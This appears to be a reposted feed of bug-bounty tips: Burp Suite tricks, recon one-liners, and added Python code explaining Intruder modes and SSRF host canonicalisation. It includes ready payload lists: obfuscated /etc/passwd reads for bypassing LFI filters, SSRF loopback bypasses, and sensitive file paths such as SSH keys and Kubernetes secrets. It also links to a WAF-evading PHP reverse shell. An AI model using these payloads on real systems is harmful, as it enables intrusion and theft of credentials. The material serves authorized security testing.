#BurpHacksForBounties - Day 25/30
Optimizing Burp Suite for better performance: take these 4 simple steps and you will notice a big difference in performance.
#infosec #appsec #burp #security #bugbountytips #bugbounty
#BurpHacksForBounties - Day 26/30
❤️ Understand the different Intruder attack types in Burp Suite
With visualizations at code level for better understanding.
Code level understanding in follow up thread 👇
#infosec #appsec #security #cybersecurity #bugbounty #bugbountytips
#BurpHacksForBounties - 27/30
See all the different Intruder attack types of Burp Suite as code
- Sniper
- Battering ram
- Cluster bomb
- Pitchfork
#infosec #appsec #bugbounty #bugbountytips #security #burp
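An added Python sketch (not the code from the original thread) of how the four attack types place payloads into marked positions and how many requests each produces. The numbered §n§ markers, the template and the payload values are constructed for this example.

```python
from itertools import product

def sniper(base, payloads):
    """One payload set. Each position is targeted in turn; the others keep
    their base value. Requests: len(base) * len(payloads)."""
    for pos in range(len(base)):
        for p in payloads:
            yield tuple(p if i == pos else b for i, b in enumerate(base))

def battering_ram(base, payloads):
    """One payload set. The same payload goes into every position at once.
    Requests: len(payloads)."""
    for p in payloads:
        yield (p,) * len(base)

def pitchfork(payload_sets):
    """One set per position, walked in lockstep; ends with the shortest set.
    Requests: min(len(s) for s in payload_sets)."""
    yield from zip(*payload_sets)

def cluster_bomb(payload_sets):
    """One set per position; every combination is sent. Requests: product of
    the set sizes. The order is itertools.product's, not claimed to be Burp's."""
    yield from product(*payload_sets)

def render(template, values):
    """Fill the numbered §n§ markers (this example's notation) in a template."""
    for n, value in enumerate(values, 1):
        template = template.replace(f"§{n}§", value)
    return template

# Constructed sample: two positions and two small payload sets.
TEMPLATE = "GET /items?id=§1§&lang=§2§ HTTP/1.1"
BASE = ("1", "en")
IDS, LANGS = ["7", "8", "9"], ["de", "fr"]

def request_counts():
    """Number of requests each attack type generates for the sample."""
    return {"sniper": len(list(sniper(BASE, IDS))),
            "battering_ram": len(list(battering_ram(BASE, IDS))),
            "pitchfork": len(list(pitchfork([IDS, LANGS]))),
            "cluster_bomb": len(list(cluster_bomb([IDS, LANGS])))}
```

The request counts matter when planning a test against rate limits: cluster bomb grows multiplicatively with every added payload set, the other three do not.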
#BurpHacksForBounties - Day 28/30 - Super CSRF POC Generator Hack.
CSRF POC generator is only available in Burp Suite pro, but not anymore.
Use this -> https://github.com/merttasci/csrf-poc-generator by @mertistaken
#infosec #burp #appsec #security #bugbountytips #bugbountytip #cybersecurity
#BurpHacksForBounties - Day 29/30
No Collaborator No worries
Burp Suite Collaborator is part of pro, so use requestbin.net
- Exactly same as collaborator
- Free 20 requests without login
- HTTP bin
- DNS bin
#infosec #appsec #bugbountytips #bugbountytip #burp
Git-Secret
Go scripts for finding an API key / some keywords in a github repository
https://github.com/daffainfo/Git-Secret
#bugbounty #bugbountytips #pentest #api #infosec
Search JS using Gau
gau -subs DOMAIN | grep -iE '\.js' | grep -iEv '(\.jsp|\.json)' >> js.txt
#bugbounty #bugbountytips
Forget Password Vulns
https://www.xmind.net/m/nZwbdk/
#AppSec #hacking #bugbountytips #websecurity #xmind
Xmind
Common Vulnerabilities on Forget Password Functionality
A Mind Map about Common Vulnerabilities on Forget Password Functionality submitted by Harsh Bothra on Jul 23, 2021. Created with Xmind.
Search Subdomains using Jldc
curl -s "jldc.me/anubis/subdomains/example.com" | grep -Po '(?<=")[\w*.-]*(?=")'
#bugbounty #bugbountytips
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
Twitter
Nguyen The Duc
Just got a working exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
LFI Bypass
1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
2) /*/?at$IFS/???/???swd
3) /****/?at$IFS/???/*swd
4) /****/?at$IFS/???/*******swd
(IFS is Internal Field Separator = [space], [tab] or a [newline])
#bugbounty #bugbountytips #lfi
Best SSRF bypass
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
#ssrf #bugbounty #bugbountytips
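Why a string blocklist for "127.0.0.1" misses every entry above, as an added defender-side Python example that is not part of the original post: it canonicalises the host the way inet_aton-style resolvers do before checking the address class. The function names are this example's own, and DNS names still have to be resolved and checked by the caller.

```python
import ipaddress
import re
from urllib.parse import urlsplit

_NUM = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")

def parse_legacy_ipv4(host):
    """Parse 1-4 dotted parts (decimal, 0-octal, 0x-hex) as inet_aton does."""
    parts = host.split(".")
    if len(parts) > 4 or not all(_NUM.fullmatch(p) for p in parts):
        return None                    # not numeric: treat as a DNS name
    try:
        nums = [int(p, 16 if p[:2].lower() == "0x" else 8 if p[0] == "0" else 10)
                for p in parts]
    except ValueError:                 # "08": leading zero but not octal
        return None
    *head, last = nums                 # the last part fills the remaining bytes
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    for i, n in enumerate(head):
        last |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(last)

def canonical_ip(url):
    """IP the host denotes, None for a DNS name; ValueError if malformed."""
    parts = urlsplit(url)
    parts.port                         # raises ValueError on a malformed port
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    if ":" in host:                    # bracketed IPv6 literal
        ip = ipaddress.ip_address(host)
        return ip.ipv4_mapped or ip
    return parse_legacy_ipv4(host)

def is_internal_literal(url):
    """True if the host is a numeric form of an internal address."""
    try:
        ip = canonical_ip(url)
    except ValueError:
        return True                    # unparseable authority: fail closed
    if ip is None:
        return False                   # DNS name: resolve, then check each address
    return ip.is_loopback or ip.is_unspecified or ip.is_private or ip.is_link_local

# The eight URLs from the list above (page data, not constructed).
PAGE_URLS = ["http://127.1/", "http://0000::1:80/", "http://[::]:80/",
             "http://2130706433/", "http://whitelisted@127.0.0.1",
             "http://0x7f000001/", "http://017700000001", "http://0177.00.00.01"]
VERDICTS = {u: is_internal_literal(u) for u in PAGE_URLS}
```

Every entry in VERDICTS is True; the unbracketed `0000::1:80` form is rejected as a malformed authority rather than interpreted.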
Django Debug Mode Bypass
https://target/login?next=/
https://target/admin
[301 to https://target/admin/login/?next=/admin/]
Change request to [POST]
[500 Django DEBUG mode and very bad information]
#bugbounty #bugbountytips #bugbountytip
Finding Sensitive Files for BugBounty
— /proc/self/cwd/index.php
— /proc/self/cwd/main.py
— /etc/motd
— /proc/net/udp
— /proc/net/arp
— /proc/self/environ
— /var/run/secrets/kubernetes.io/serviceaccount
— /proc/cmdline
— /proc/mounts
— /etc/motd
— /etc/mysql/my.cnf
— /proc/sched_debug
— /home/user/.bash_history
— /home/user/.ssh/id_rsa
#sensitive #files #bugbounty #bugbountytips
Forwarded from Offensive Xwitter
😈 [ 0x0SojalSec, Md Ismail Šojal ]
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇
🔗 https://gist.github.com/0xSojalSec/5bee09c7035985ddc13fddb16f191075
#bugbountyTips #bugbounty
🐥 [ tweet ]